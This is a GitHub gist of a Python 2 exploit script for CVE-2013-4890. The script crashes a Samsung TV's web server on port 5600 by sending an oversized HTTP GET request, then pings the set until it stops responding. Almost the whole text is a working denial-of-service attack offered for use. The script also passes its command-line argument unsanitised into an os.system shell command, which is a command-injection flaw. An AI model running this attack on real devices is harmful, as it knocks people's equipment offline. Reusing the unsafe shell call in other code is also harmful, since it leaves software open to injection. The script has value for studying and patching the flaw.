Created
December 22, 2014 13:09
-
-
Save threathunting/fd8336cd00d323736004 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Exploit Title: Samsung TV Denial of Service (DoS) Attack | |
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com | |
# Date: 07/21/2013 | |
# CVE Number: CVE-2013-4890 | |
# Vendor Homepage: http://www.samsung.com | |
# Description: | |
# The webserver (DMCRUIS/0.1) on TCP/5600 crashes by sending a long HTTP GET request | |
# As a results, the TV reboots... | |
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :) | |
import httplib | |
import sys | |
import os | |
# Sends the payload | |
print " Sending the malicious payload...\n" | |
conn = httplib.HTTPConnection(sys.argv[1],5600) | |
conn.request("GET", "A"*300) | |
conn.close() | |
# Checks the response | |
print " Checking the status... (CTRL+Z to stop)\n" | |
response = 0 | |
while response == 0: | |
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1") | |
if response != 0: | |
print " Target down!\n" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment